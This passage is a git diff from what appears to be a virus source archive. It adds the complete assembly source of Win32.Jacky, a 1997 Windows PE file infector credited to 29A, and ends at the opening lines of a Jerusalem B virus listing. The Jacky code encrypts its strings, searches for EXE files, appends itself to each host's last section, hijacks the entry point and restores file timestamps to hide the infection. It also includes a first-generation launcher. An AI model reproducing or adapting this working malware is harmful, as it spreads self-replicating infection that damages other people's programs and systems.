tasm32 -ml -m5 -q -zn w32jacky.asm +; tlink32 -Tpe -c -x -aa w32jacky,,, import32 +; pewrsec w32jacky.exe +; +; +; (c) 1997 Jacky Qwerty/29A. + + +.386p +.model flat ;whoaa.. 
no more segmentz + +;Some includez containin very useful structurez and constantz for Win32 + +include Useful.inc +include Win32API.inc +include MZ.inc +include PE.inc + +;Some equ's needed by the virus + +work_size equ 4000h ;size to grow up memory maped file +size_pad equ 101 ;size paddin to mark infected filez +v_size equ v_end - v_start ;virus absolute size in filez + +extrn GetModuleHandleA :proc ;APIs used durin first generation only +extrn GetProcAddress :proc + +.data + db ? ;some dummy data so tlink32 dont yell + +.code + +;Virus code starts here + +v_start: + + push eax ;make space to store return adress + pushad ;save all + call get_deltaz ;here we go + +;API namez needed by the virus. They will travel in encrypted form + +ve_stringz: + +veszKernel32 db 'KERNEL32',0 +veszGetModuleHandleA db 'GetModuleHandleA',0 +veszGetProcAddress db 'GetProcAddress',0 + +eEXE_filez db '*.EXE',0 ;filez to search + +veszCreateFileA db 'CreateFileA',0 +veszCreateFileMappingA db 'CreateFileMappingA',0 +veszCloseHandle db 'CloseHandle',0 +veszUnmapViewOfFile db 'UnmapViewOfFile',0 +veszMapViewOfFile db 'MapViewOfFile',0 +veszFindFirstFileA db 'FindFirstFileA',0 +veszFindNextFileA db 'FindNextFileA',0 +veszFindClose db 'FindClose',0 +veszSetFileAttributesA db 'SetFileAttributesA',0 +veszSetFilePointer db 'SetFilePointer',0 +veszSetEndOfFile db 'SetEndOfFile',0 +veszSetFileTime db 'SetFileTime',0 + +eEndOfFunctionNames db 0 + +;An epitaph to a good friend of mine (not a "junkie" Pete) + +db 'To My d34d fRi3nD c4b4n4s..',CRLF +db 'A Win/NT/95 ViRuS v1.00. ',CRLF +db 'By: j4cKy Qw3rTy / 29A. 
',CRLF +db 'jqw3rty@cryogen.com',0 + +ve_string_size = $ - ve_stringz + +crypt: lodsb ;decrypt API stringz + rol al,cl + not al + stosb + loop crypt + ret + +get_deltaz: + + mov ecx,ve_string_size + pop esi ;get pointer to ve_stringz + cld + lea ebp,[esi + v_end - ve_stringz] ;get pointer to virus end + lea eax,[esi + v_start - ve_stringz] + mov edi,ebp + stosd ;save pointer to virus start + add eax,- 12345678h +delta_host = dword ptr $ - 4 + stosd ;save current host base adress + lea edi,[ebp + v_stringz - v_end] ;get pointer to API namez + sub eax,- 12345678h +phost_start_rva = dword ptr $ - 4 + push edi ;push pointer to "KERNEL32" string + xchg ebx,eax + mov [esp.(Pshd).cPushad.RetAddr],ebx ;save host entry to return + +decrypt_stringz: + + call crypt ;decrypt encrypted API and stringz + call MyGetModuleHandleA ;get KERNEL32 base adress + jecxz jmp_host_2 + mov [ebp + K32Mod - v_end],ecx ;save it + lea esi,[ebp + FunctionNamez - v_end] + lea edi,[ebp + FunctionAddressez - v_end] + +GetAPIAddress: ;get adressez of API functionz used by the virus + + push esi + call MyGetProcAddressK32 ;get API adress + +jmp_host_2: + + jecxz jmp_host + cld + xchg eax,ecx + stosd ;save retrieved API adress + lodsb ;point to next API name + test al,al + jnz $ - 3 + cmp al,[esi] ;end of API namez reached? 
+ jnz GetAPIAddress ;no, get next API adress + + lea ebx,[ebp + FindData - v_end] ;Find filez matchin *.EXE + push ebx + lea eax,[ebp + EXE_filez - v_end] + push eax + call [ebp + ddFindFirstFileA - v_end] ;call FindFirstFileA API + inc eax + jz jmp_host + dec eax + push eax ;save search handle + +Process_File: ;check file and infect it + + lea edx,[ebx.WFD_szFileName] + call Open&MapFile ;open and map file + jecxz Find_Next + xor eax,eax + cmp [ebx.WFD_nFileSizeHigh],eax ;skip filez too large (>1GB) + jnz Close_File + add eax,[ebx.WFD_nFileSizeLow] + js Close_File + add eax,-80h ;skip filez too short + jnc Close_File + call Check_PE_sign ;it has to be a PE file + jnz Close_File + test ah,IMAGE_FILE_DLL shr 8 ;can't have DLL bit + jnz Close_File + xor ecx,ecx + mov eax,[ebx.WFD_nFileSizeLow] ;check if file is infected + mov cl,size_pad + cdq + div ecx + mov esi,edx ;esi == 0, file already infected or not infectable + ;esi != 0, file not infected, i.e. infect it! +Close_File: + + call Close&UnmapFile ;close and unmap file + mov ecx,esi + jecxz Find_Next ;jump and find next file + call Infect ;infect file + +Find_Next: + + pop eax ;find next file + push eax ebx eax + call [ebp + ddFindNextFileA - v_end] + test eax,eax + jnz Process_File + +Find_Close: + + call [ebp + ddFindClose - v_end] ;no more filez, close search + +jmp_host: + + popad ;jump to host + ret + +Infect proc ;blank file attributez, open and map file in r/w mode, + ;infect it, restore date/time stamp and attributez + + lea edx,[ebx.WFD_szFileName] ;get filename + push edx 0 edx + call [ebp + ddSetFileAttributesA - v_end] ;blank file attributez + xchg ecx,eax + pop edx + jecxz end_Infect1 + mov edi,work_size + add edi,[ebx.WFD_nFileSizeLow] + call Open&MapFileAdj ;open and map file in read/write mode + jecxz end_Infect2 + lea esi,[ebp + vszKernel32 - v_end] + lea eax,[ebp + vszGetModuleHandleA - v_end] + push eax esi + lea eax,[ebp + vszGetProcAddress - v_end] + push eax esi ecx + call GetProcAddressIT 
;get ptr to GetProcAddress API + mov [ebp + ddGetProcAddress - v_end],eax + push ecx + xor esi,esi + call GetProcAddressIT ;get ptr to GetModuleHandleA API + mov [ebp + ddGetModuleHandleA - v_end],eax + test eax,eax + jnz GetModHandle_found ;if GetModuleHandleA found, + test esi,esi ;jump and attach virus + jz end_Infect3 ;KERNEL32 import descriptor not found, + ;then dont infect + + x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR + + ;GetModuleHandleA not found + + cmp [esi.ID_TimeDateStamp - x],eax ;check if we can rely on + jz got_easy ;the ForwarderChain trick + cmp eax,[esi.ID_OriginalFirstThunk - x] + jz end_Infect3 + mov [esi.ID_TimeDateStamp - x],eax + +got_easy: + + mov eax,[esi.ID_ForwarderChain - x] ;hardcode pointerz to + mov [ebp + ptrForwarderChain - v_end],edx ;the ForwarderChain + mov [ebp + ddForwarderChain - v_end],eax ;field + +GetModHandle_found: + + mov esi,[ebp + pv_start - v_end] + call Attach ;attach virus to host +end_Infect3: + + call Close&UnmapFileAdj ;close and unmap file + +end_Infect2: + + mov ecx,[ebx.WFD_dwFileAttributes] ;restore original atribute + jecxz end_Infect1 + lea edx,[ebx.WFD_szFileName] + push ecx edx + call [ebp + ddSetFileAttributesA - v_end] + +end_Infect1: + + ret + +Infect endp + +Check_PE_sign proc ;checks validity of a PE file + ; on entry: EDX = host file size + ; ECX = base address of memory-maped file + ; EBX = pointer to WIN32_FIND_DATA structure + ; EAX = host file size - 80h + ; on exit: Zero flag = 1, infectable PE file + ; Zero flag = 0, not infectable file + + cmp word ptr [ecx],IMAGE_DOS_SIGNATURE ;needs MZ signature + jnz end_check_PE_sign + cmp word ptr [ecx.MZ_lfarlc],40h ;needs Win signature + jb end_check_PE_sign ;(well not necesarily) + mov edi,[ecx.MZ_lfanew] ;get ptr to new exe format + cmp eax,edi ;ptr out of range? 
+ jb end_check_PE_sign + add edi,ecx + cmp dword ptr [edi],IMAGE_NT_SIGNATURE ;check PE signature + jnz end_check_PE_sign + cmp word ptr [edi.NT_FileHeader.FH_Machine], \ ;must be 386+ + IMAGE_FILE_MACHINE_I386 + jnz end_check_PE_sign + mov eax,dword ptr [edi.NT_FileHeader.FH_Characteristics] + not al + test al,IMAGE_FILE_EXECUTABLE_IMAGE ;must have the executable bit + +end_check_PE_sign: + + ret + +Check_PE_sign endp + +Open&MapFile proc ;open and map file in read only mode + ; on entry: + ; EDX = pszFileName (pointer to file name) + ; on exit: + ; ECX = 0, if error + ; ECX = base adress of memory-maped file, if ok + + xor edi,edi + +Open&MapFileAdj: ;open and map file in read/write mode + ; on entry: + ; EDI = file size + work space (in bytes) + ; EDX = pszFileName (pointer to file name) + ; on exit: + ; ECX = 0, if error + ; ECX = base adress of memory-maped file, if ok + ; EDI = old file size + + xor eax,eax + push eax eax OPEN_EXISTING eax eax + mov al,1 + ror eax,1 + mov ecx,edi + jecxz $+4 + rcr eax,1 + push eax edx + call [ebp + ddCreateFileA - v_end] ;open file + cdq + inc eax + jz end_Open&MapFile + dec eax + push eax ;push first handle + + xor esi,esi + push edx edi edx + mov dl,PAGE_READONLY + mov ecx,edi + jecxz $+4 + shl dl,1 + push edx esi eax + call [ebp + ddCreateFileMappingA - v_end] ;create file + cdq ;mapping + xchg ecx,eax + jecxz end_Open&MapFile2 + push ecx ;push second handle + + push edi edx edx + mov dl,FILE_MAP_READ + test edi,edi + jz OMF_RdOnly + shr dl,1 + mov edi,[ebx.WFD_nFileSizeLow] +OMF_RdOnly: push edx ecx + call [ebp + ddMapViewOfFile - v_end] ;map view of file + xchg ecx,eax + jecxz end_Open&MapFile3 + push ecx ;push base address of + ;memory-mapped file + jmp [esp.(3*Pshd).RetAddr] ;jump to return adress leavin + ;parameterz in the stack +Open&MapFile endp + +Close&UnmapFile proc ;close and unmap file previosly opened in r/o mode + + xor edi,edi + +Close&UnmapFileAdj: ;close and unmap file previosly opened in r/w mode + + pop 
eax ;return adress
+ mov [esp.(3*Pshd).RetAddr],eax
+ call [ebp + ddUnmapViewOfFile - v_end] ;unmap view of file
+
+end_Open&MapFile3:
+
+ call [ebp + ddCloseHandle - v_end] ;close handle
+ mov ecx,edi
+ jecxz end_Open&MapFile2 ;if read only mode jump
+ pop eax
+ push eax eax
+ xor esi,esi
+ push esi esi edi eax
+ xchg edi,eax
+ call [ebp + ddSetFilePointer - v_end] ;move file pointer to
+ ;the real end of file
+ call [ebp + ddSetEndOfFile - v_end] ;truncate file at
+ lea eax,[ebx.WFD_ftLastWriteTime] ;real end of file
+ push eax esi esi edi
+ call [ebp + ddSetFileTime - v_end] ;restore original
+ ;date/time stamp
+end_Open&MapFile2:
+
+ call [ebp + ddCloseHandle - v_end] ;close handle
+
+end_Open&MapFile:
+
+ xor ecx,ecx
+ ret
+
+Close&UnmapFile endp
+
+Attach proc ;attach virus code to last section in the PE file and
+ ; change section characteristicz to reflect infection
+ ;on entry:
+ ; ECX = base of memory-maped file
+ ; ESI = pointer to start of virus code
+ ;on exit:
+ ; EDI = new file size
+ pushad
+ push ecx
+ mov ebp,ecx ;get base adress
+ add ebp,[ebp.MZ_lfanew] ;get PE header base
+ movzx ecx,word ptr [ebp.NT_FileHeader \ ;get Number of Sections
+ .FH_NumberOfSections]
+ xor eax,eax
+ movzx edi,word ptr [ebp.NT_FileHeader \ ;get 1st section header
+ .FH_SizeOfOptionalHeader]
+ x = IMAGE_SIZEOF_SECTION_HEADER
+ mov al,x
+ mul ecx ;get last section header
+ pop edx
+ jecxz end_Attach2
+ add edi,eax
+ lea ebx,[ebp.NT_OptionalHeader + edi]
+ mov ecx,[ebx.SH_SizeOfRawData - x]
+ mov eax,[ebx.SH_VirtualSize - x]
+ cmp ecx,eax
+ jnc $+3
+ xchg eax,ecx
+ add edx,[ebx.SH_PointerToRawData - x]
+ sub eax,-3
+ mov ecx,(v_size + 3)/4
+ and al,-4
+ lea edi,[eax+edx] ;find pointer in last section where virus
+ cld ;will be copied
+ rep movsd ;copy virus
+ add eax,[ebx.SH_VirtualAddress - x] ;calculate virus entry point
+ mov ecx,[ebp.NT_OptionalHeader.OH_FileAlignment] ;in RVA
+
+end_Attach2:
+
+ jecxz end_Attach
+ push eax ;virus entry point
+ lea esi,[edi + (phost_start_rva - v_start) - ((v_size + 3) \
+ and (-4))]
+ neg eax
+ sub edi,edx
+ mov [esi + delta_host - phost_start_rva],eax ;harcode delta to
+ lea eax,[ecx+edi-1] ;host base adress
+ cdq ;edx=0
+ sub edx,[ebp.NT_OptionalHeader.OH_AddressOfEntryPoint]
+ mov [esi],edx ;hardcode delta to original entry point RVA
+ cdq ;edx=0
+ div ecx
+ pop esi ;virus entry point
+ mul ecx ;calculate new size of section (raw data)
+ xchg eax,edi
+ mov ecx,[ebp.NT_OptionalHeader.OH_SectionAlignment]
+ add eax,(virtual_end - v_end + 3) and (-4)
+ jecxz end_Attach
+ cmp [ebx.SH_VirtualSize - x],eax
+ jnc n_vir
+ mov [ebx.SH_VirtualSize - x],eax ;store new size of section (RVA)
+ n_vir: dec eax
+ mov [ebx.SH_SizeOfRawData - x],edi ;store new size of section
+ add eax,ecx ;(raw data)
+ div ecx
+ mul ecx
+ add eax,[ebx.SH_VirtualAddress - x]
+ cmp [ebp.NT_OptionalHeader.OH_SizeOfImage],eax
+ jnc n_img
+ mov [ebp.NT_OptionalHeader.OH_SizeOfImage],eax ;store new size
+ ;of image (RVA)
+ n_img: add edi,[ebx.SH_PointerToRawData - x] ;get new file size
+ sub ecx,ecx
+ or byte ptr [ebx.SH_Characteristics.hiw.hib - x],0E0h ;change
+ ; (IMAGE_SCN_MEM_EXECUTE or \ ;section characte-
+ ; IMAGE_SCN_MEM_READ or \ ;risticz to: execute,
+ ; IMAGE_SCN_MEM_WRITE) shr 12 ;read & write access
+ pop eax ;get original file size
+ mov cl,size_pad
+ cdq ; edx=0
+ cmp edi,eax ;compare it with new file size
+ jc $+3
+ xchg edi,eax ;take the greater
+ sub eax,1 - size_pad
+ div ecx
+ mul ecx ;grow file size to a multiple of size_pad
+ push eax
+ mov [ebp.NT_OptionalHeader.OH_AddressOfEntryPoint],esi ;change
+ ;entry point
+end_Attach:
+
+ popad
+ ret
+
+Attach endp
+
+GetProcAddressIT proc ;gets a pointer to an API function from the Import Table
+ ; (the object inspected is in raw form, ie memory-maped)
+ ;on entry:
+ ; TOS+0Ch (Arg3): API function name
+ ; TOS+08h (Arg2): module name
+ ; TOS+04h (Arg1): base adress of memory-maped file
+ ; TOS+00h (return adress)
+ ;on exit:
+ ; EAX = RVA pointer to IAT entry
+ ; EAX = 0, if not found
+ pushad
+ mov ebp,[esp.cPushad.Arg1] ;get Module Handle from Arg1
+ lea esi,[ebp.MZ_lfanew]
+ add esi,[esi] ;get address of PE header + MZ_lfanew
+ mov ecx,[esi.NT_OptionalHeader \ ;get size of import directory
+ .OH_DirectoryEntries \
+ .DE_Import \
+ .DD_Size \
+ -MZ_lfanew]
+ jecxz End_GetProcAddressIT2 ;if size is zero, no API imported!
+ movzx ecx,word ptr [esi.NT_FileHeader \ ;get number of sectionz
+ .FH_NumberOfSections \
+ -MZ_lfanew]
+ jecxz End_GetProcAddressIT2
+ movzx ebx,word ptr [esi.NT_FileHeader \ ;get 1st section header
+ .FH_SizeOfOptionalHeader \
+ -MZ_lfanew]
+ lea ebx,[esi.NT_OptionalHeader + ebx - MZ_lfanew]
+ x = IMAGE_SIZEOF_SECTION_HEADER
+
+match_virtual: ;find section containin the import table. (not necesarily
+ ;its in the .idata section!)
+
+ mov edi,[esi.NT_OptionalHeader \ ;get address of import table
+ .OH_DirectoryEntries \
+ .DE_Import \
+ .DD_VirtualAddress \
+ -MZ_lfanew]
+ mov edx,[ebx.SH_VirtualAddress] ;get RVA start pointer of
+ sub edi,edx ;current section
+ add ebx,x
+ cmp edi,[ebx.SH_VirtualSize - x] ;address of import table
+ ;inside current section?
+ jb import_section_found ;yea, we found it
+ loop match_virtual ;no, try next section
+ jmp End_GetProcAddressIT ;no more sectionz, shit.. go
+
+import_section_found:
+
+ push edi
+ mov eax,[ebx.SH_SizeOfRawData - x]
+ mov ebx,[ebx.SH_PointerToRawData - x]
+ xchg ebp,eax ;get RAW size of import section (EBP)
+ add ebx,eax ;get RAW start of import section (EBX)
+ cld
+ x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR
+
+Get_DLL_Name: ;scan each import descriptor inside import section to match
+ ;module name specified
+
+ pop esi ;diference (if any) between start
+ ;of imp.table and start of imp.section
+ mov ecx,[ebx.esi.ID_Name] ;get RVA pointer to imp.module name
+
+End_GetProcAddressIT2:
+
+ jecxz End_GetProcAddressIT ;end of import descriptorz?
+ sub ecx,edx ;convert RVA pointer to RAW
+ cmp ecx,ebp ;check if it points inside section
+ jae End_GetProcAddressIT
+ add esi,x
+ push esi ;save next import descriptor for later
+ lea esi,[ebx + ecx] ;retrieval
+ mov edi,[esp.(Pshd).cPushad.Arg2] ;get module name specified
+ ;from Arg2
+Next_char_from_DLL: ;do a char by char comparison with module name found
+ ;inside section. Stop when a NULL or a dot is found
+ lodsb
+ add al,-'.'
+ jz IT_nup ;its a dot
+ sub al,-'.'+'a'
+ cmp al, 'z'-'a'+ 1
+ jae no_up
+ add al,-20h ;convert to upercase
+no_up: sub al,-'a'
+IT_nup: scasb
+ jnz Get_DLL_Name ;names dont match, get next import descriptor
+ cmp byte ptr [edi-1],0
+ jnz Next_char_from_DLL
+
+Found_DLL_name: ;we got the import descriptor containin specified module name
+
+ pop esi
+ lea eax,[edx + esi.ID_ForwarderChain - x]
+ add esi,ebx
+ mov [esp.Pushad_edx],eax ;store ptr to ForwarderChain for l8r
+ mov [esp.Pushad_esi],esi ;store ptr to imp.descriptor for l8r
+ push dword ptr [esp.cPushad.Arg3]
+ mov eax,[esp.(Pshd).Pushad_ebp]
+ push dword ptr [eax + K32Mod - v_end]
+ call GetProcAddressET ;scan exp.table of spec.module handle
+ xchg eax,ecx ;and get function adress of spec.API
+ mov ecx,[esi.ID_FirstThunk - x] ;This is needed just in case the
+ ;API function adressez are bound
+ jecxz End_GetProcAddressIT ;if not found then go, this value cant
+ ;be zero or the IAT wont be patched
+ push eax
+ call GetProcAddrIAT ;inspect first thunk (which later will
+ test eax,eax ;be patched by the loader)
+ jnz IAT_found ;if found then jump (save it and go)
+ mov ecx,[esi.ID_OriginalFirstThunk - x] ;get original thunk
+ ;(which later will hold the original
+ ;unpatched IAT)
+ jecxz End_GetProcAddressIT ;if not found then go, this value
+ push eax ;could be zero
+ call GetProcAddrIAT ;inspect original thunk
+ test eax,eax
+ jz IAT_found ;jump if not found
+ sub eax,ecx ;we got the pointer
+ add eax,[esi.ID_FirstThunk - x] ;convert it to RVA
+ db 6Bh,33h,0C0h ;imul esi,[ebx],-0C0h ;bizarre! but no jump
+ org $ - 2 ;necesary!
+
+End_GetProcAddressIT:
+
+ db 33h,0C0h ;xor eax,eax ;error, adress not found
+
+IAT_found:
+
+ mov [esp.Pushad_eax],eax ;save IAT entry pointer
+ popad
+ ret (3*Pshd) ;go and unwind parameterz in stack
+
+GetProcAddrIAT: ;this function scans the IMAGE_THUNK_DATA array of "dwords"
+ ; from the selected IMAGE_IMPORT_DESCRIPTOR, searchin for
+ ; the selected API name. This function works for both
+ ; bound and unbound import descriptorz. This function is
+ ; called from inside GetProcAddressIT.
+ ;on entry:
+ ; EBX = RAW start pointer of import section
+ ; ECX = RVA pointer to IMAGE_THUNK_ARRAY
+ ; EDX = RVA start pointer of import section
+ ; EDI = pointer selected API function name.
+ ; EBP = RAW size of import section
+ ; TOS+04h (Arg1): real address of API function inside selected
+ ; module (in case the descriptor is unbound).
+ ; TOS+00h (return adress)
+ ;on exit:
+ ; EAX = RVA pointer to IAT entry
+ ; EAX = 0, if not found
+
+ push ecx
+ push esi
+
+ xor eax,eax
+ sub ecx,edx
+ cmp ecx,ebp
+ jae IT_not_found
+ lea esi,[ebx + ecx] ;get RAW pointer to IMAGE_THUNK_DATA array
+
+next_thunk_dword:
+
+ lodsd ;get dword value
+ test eax,eax ;end of IMAGE_THUNK_DATA array?
+ jz IT_not_found
+
+no_ordinal:
+
+ sub eax,edx ;convert dword to a RAW pointer
+ cmp eax,ebp ;dword belongs to an unbound image descriptor?
+ jb IT_search ;no, jump
+ add eax,edx ;we have the API adress, reconvert to RVA
+ cmp eax,[esp.(2*Pshd).Arg1] ;API adressez match?
+ jmp IT_found? ;yea, we found it, jump
+
+IT_search:
+
+ push esi ;image descr.contains imports by name
+ lea esi,[ebx+eax.IBN_Name] ;get API name from import descriptor
+ mov edi,[esp.(5*Pshd).cPushad.Arg3] ;get API name selected as a
+ ;parameter
+IT_next_char:
+ ;find req.API from all imported API namez
+ cmpsb ;do APIz match?
+ jnz IT_new_search ;no, continue searchin
+
+IT_Matched_char:
+
+ cmp byte ptr [esi-1],0
+ jnz IT_next_char
+
+IT_new_search:
+
+ pop esi ;yea, they match, we found it
+
+IT_found?:
+
+ jnz next_thunk_dword
+ lea eax,[edx+esi-4] ;get the pointer to the new IAT entry
+ sub eax,ebx ;convert it to RVA
+
+IT_not_found:
+
+ pop esi
+ pop ecx
+
+ ret (Pshd)
+
+GetProcAddressIT endp
+
+GetProcAddressET proc ;This function is similar to GetProcAddressIT except
+ ; that it looks for API functions in the export table
+ ; of a given DLL module. It has the same functionality
+ ; as the original GetProcAddress API exported from
+ ; KERNEL32 except that it is able to find API
+ ; functions exported by ordinal from KERNEL32.
+ ;on entry:
+ ; TOS+08h (Arg2): pszAPIname (pointer to API name)
+ ; TOS+04h (Arg1): module handle/base address of module
+ ; TOS+00h (return adress)
+ ;on exit:
+ ; ECX = API function address
+ ; ECX = 0, if not found
+ pushad
+ mov eax,[esp.cPushad.Arg1] ;get Module Handle from Arg1
+ mov ebx,eax
+ add eax,[eax.MZ_lfanew] ;get address of PE header
+ mov ecx,[eax.NT_OptionalHeader \ ;get size of Export directory
+ .OH_DirectoryEntries \
+ .DE_Export \
+ .DD_Size]
+ jecxz Proc_Address_not_found ;size is zero, No API exported !
+ mov ebp,ebx ;get address of Export directory
+ add ebp,[eax.NT_OptionalHeader \
+ .OH_DirectoryEntries \
+ .DE_Export \
+ .DD_VirtualAddress]
+ifndef NoOrdinal
+ mov eax,[esp.cPushad.Arg2] ;get address of requested API name or
+ ;ordinal value from Arg2
+ test eax,-10000h ;check if Arg2 is an ordinal
+ jz Its_API_ordinal
+endif
+
+Its_API_name:
+
+ push ecx
+ mov edx,ebx ;get address of exported API names
+ add edx,[ebp.ED_AddressOfNames]
+ mov ecx,[ebp.ED_NumberOfNames] ;get number of exported API names
+ xor eax,eax
+ cld
+
+Search_for_API_name:
+
+ mov esi,ebx ;get address of next exported API name
+ add esi,[edx+eax*4]
+ mov edi,[esp.Pshd.cPushad.Arg2] ;get address of requested API name
+ ;from Arg2
+Next_Char_in_API_name:
+
+ cmpsb ;find requested API from all
+ jz Matched_char_in_API_name ;exported API namez
+ inc eax
+ loop Search_for_API_name
+ pop eax
+
+Proc_Address_not_found:
+
+ xor eax,eax ;API not found
+ jmp End_GetProcAddressET
+
+ifndef NoOrdinal
+
+Its_API_ordinal:
+
+ sub eax,[ebp.ED_BaseOrdinal] ;normalize Ordinal, i.e.
+ jmp Check_Index ;convert it to an index
+endif
+
+Matched_char_in_API_name:
+
+ cmp byte ptr [esi-1],0 ;end of API name reached?
+ jnz Next_Char_in_API_name
+ pop ecx
+ mov edx,ebx ;get address of exp.API ordinals
+ add edx,[ebp.ED_AddressOfOrdinals]
+ movzx eax,word ptr [edx+eax*2] ;get index into exp.API functions
+
+Check_Index:
+
+ cmp eax,[ebp.ED_NumberOfFunctions] ;check for out of range index
+ jae Proc_Address_not_found
+ mov edx,ebx ;get address of exported API functions
+ add edx,[ebp.ED_AddressOfFunctions]
+ add ebx,[edx+eax*4] ;get address of requested API function
+ mov eax,ebx
+ sub ebx,ebp ;take care of forwarded API functions
+ cmp ebx,ecx
+ jb Proc_Address_not_found
+
+End_GetProcAddressET:
+
+ mov [esp.Pushad_ecx],eax ;set requested Proc Address, if found
+ popad
+ ret (2*Pshd)
+
+GetProcAddressET endp
+
+MyGetProcAddressK32: ;this function is simply a wraper to the GetProcAddress
+ ; API. It retrieves the address of an API function
+ ; exported from KERNEL32.
+ ;on entry:
+ ; TOS+04h (Arg1): pszAPIname (pointer to API name)
+ ; TOS+00h (return adress)
+ ;on exit:
+ ; ECX = API function address
+ ; ECX = 0, if not found
+
+
+ pop eax
+ push dword ptr [ebp + K32Mod - v_end] ;KERNEL32 module handle
+ push eax
+
+MyGetProcAddress proc
+
+ mov ecx,12345678h ;this dynamic variable will hold an RVA
+ddGetProcAddress = dword ptr $ - 4 ;pointer to the GetProcAddress API in
+ ;the IAT
+gotoGetProcAddressET:
+
+ jecxz GetProcAddressET
+ push [esp.Arg2]
+ push [esp.(Pshd).Arg1]
+ add ecx,[ebp + phost_hdr - v_end]
+ call [ecx] ;call the original GetProcAddress API
+ xchg ecx,eax
+ jecxz gotoGetProcAddressET ;if error, call my own GetProcAddress
+ ret (2*Pshd) ;function
+
+MyGetProcAddress endp
+
+MyGetModuleHandleA proc ;this function retrieves the base address/module
+ ;handle of a DLL module previosly loaded to memory.
+ pop ecx
+ pop eax
+ push ecx
+ mov edx,[ebp + phost_hdr - v_end]
+ mov ecx,12345678h ;this dynamic variable will hold an RVA
+ddGetModuleHandleA = dword ptr $ - 4 ;pointer to the GetModuleHandleA API in
+ jecxz check_K32 ;the IAT
+
+GetModHandleA:
+
+ push eax
+ call [ecx + edx] ;call the original GetModuleHandleA API
+ xor ecx,ecx
+ jmp really_PE?
+
+check_K32:
+
+ mov eax,[edx + 12345678h] ;this dynamic variable will hold an
+ ;RVA pointer to the ForwarderChain
+ ;field in the KERNEL32 import
+ ;descriptor. This is an undocumented
+ptrForwarderChain = dword ptr $ - 4 ;feature to get the K32 base address
+ inc eax
+ jz End_GetModHandleA ;make sure the base address is ok
+ dec eax
+ jz End_GetModHandleA
+ cmp eax,12345678h ;this dynamic variable will hold the
+ ;prev.contents of the ForwarderChain
+ ;field in the K32 import descriptor
+ddForwarderChain = dword ptr $ - 4 ;if they match, then the Win32 loader
+ jz End_GetModHandleA ;didnt copy the K32 base address
+
+really_PE?:
+
+ cmp word ptr [eax],IMAGE_DOS_SIGNATURE ;make sure its the base
+ jnz End_GetModHandleA ;address of a PE module
+ mov edx,[eax.MZ_lfanew]
+ cmp dword ptr [eax + edx],IMAGE_NT_SIGNATURE
+ jnz End_GetModHandleA
+ xchg ecx,eax
+
+End_GetModHandleA:
+
+ ret
+
+MyGetModuleHandleA endp
+
+align 4 ;set dword alignment
+
+v_end:
+
+;uninitialized data ;these variablez will be addressed in memory, but
+ ;dont waste space in the file
+
+pv_start dd ? ;pointer to virus start in memory
+phost_hdr dd ? ;ptr to the host base address in mem
+K32Mod dd ? ;KERNEL32 base address
+
+FunctionAddressez: ;these variables will hold the API function addressez
+ ;used in the virus
+
+ddCreateFileA dd ?
+ddCreateFileMappingA dd ?
+ddCloseHandle dd ?
+ddUnmapViewOfFile dd ?
+ddMapViewOfFile dd ?
+ddFindFirstFileA dd ?
+ddFindNextFileA dd ?
+ddFindClose dd ?
+ddSetFileAttributesA dd ?
+ddSetFilePointer dd ?
+ddSetEndOfFile dd ?
+ddSetFileTime dd ?
+
+v_stringz: ;the API names used by the virus are decrypted here
+
+vszKernel32 db 'KERNEL32',0
+vszGetModuleHandleA db 'GetModuleHandleA',0
+vszGetProcAddress db 'GetProcAddress',0
+
+EXE_filez db '*.EXE',0 ;the file mask
+
+FunctionNamez:
+
+vszCreateFileA db 'CreateFileA',0
+vszCreateFileMappingA db 'CreateFileMappingA',0
+vszCloseHandle db 'CloseHandle',0
+vszUnmapViewOfFile db 'UnmapViewOfFile',0
+vszMapViewOfFile db 'MapViewOfFile',0
+vszFindFirstFileA db 'FindFirstFileA',0
+vszFindNextFileA db 'FindNextFileA',0
+vszFindClose db 'FindClose',0
+vszSetFileAttributesA db 'SetFileAttributesA',0
+vszSetFilePointer db 'SetFilePointer',0
+vszSetEndOfFile db 'SetEndOfFile',0
+vszSetFileTime db 'SetFileTime',0
+
+EndOfFunctionNames db 0
+
+align 4
+
+FindData WIN32_FIND_DATA ?
+
+virtual_end:
+
+first_generation: ;this routine will be called only once from the first
+ ;generation sample, it simply initializes some variables
+ ;needed in the very first run.
+jumps
+ push NULL
+ call GetModuleHandleA
+ test eax,eax
+ jz exit_host
+ xchg ecx,eax
+ call here
+here: pop ebx
+
+ mov eax,ebx
+ sub eax,here - v_start
+ sub eax,ecx
+ neg eax
+ mov [ebx + delta_host - here],eax ;set delta host value
+
+ mov eax,ebx
+ sub eax,here - host
+ sub eax,ecx
+ neg eax
+ mov [ebx + phost_start_rva - here],eax ;set pointer to
+ ;host's base adress
+ mov eax,[ebx + pfnGMH - here]
+ .if word ptr [eax] == 25FFh ; JMP [nnnnnnnn]
+ mov eax,[eax + 2]
+ .endif
+ sub eax,ecx
+ mov [ebx + ddGetModuleHandleA - here],eax ;set GetModuleHandleA
+ ;RVA pointer
+ mov eax,[ebx + pfnGPA - here]
+ .if word ptr [eax] == 25FFh ; JMP [nnnnnnnn]
+ mov eax,[eax + 2]
+ .endif
+ sub eax,ecx
+ mov [ebx + ddGetProcAddress - here],eax ;set GetProcAddress
+ ;RVA pointer
+ pushad ;encrypt unencrypted API namez and other
+ ;stringz
+ cld
+ mov ecx,ve_string_size
+ lea esi,[ebx + ve_stringz - here]
+ mov edi,esi
+ call crypt_back
+ popad
+ jmp v_start ;ok, here we go.. jump to virus start..
+
+crypt_back: ;encryption routine
+
+ lodsb
+ not al
+ ror al,cl
+ stosb
+ loop crypt_back
+ ret
+
+pfnGMH dd offset GetModuleHandleA
+pfnGPA dd offset GetProcAddress
+
+;Host code starts here
+
+extrn MessageBoxA: proc
+extrn ExitProcess: proc
+
+host: ;here begins the original host code
+
+;Display Message box
+
+ push MB_OK
+ @pushsz "(c) Win32.Jacky by jqwerty/29A"
+ @pushsz "First generation sample"
+ push NULL
+ call MessageBoxA
+
+;Exit host
+
+exit_host:
+
+ push 0
+ call ExitProcess
+
+ end first_generation
diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru-b.asm b/MSDOS/Virus.MSDOS.Unknown.jeru-b.asm
new file mode 100644
index 00000000..556a184d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jeru-b.asm
@@ -0,0 +1,794 @@
+This is the Jerusalem B Virus.
+"JV.MOC" PAGE 0001
+
+0000:0000 E99200 JMP X0095
+0000:0003 7355 JAE X005A
+0000:0005 4D DEC BP
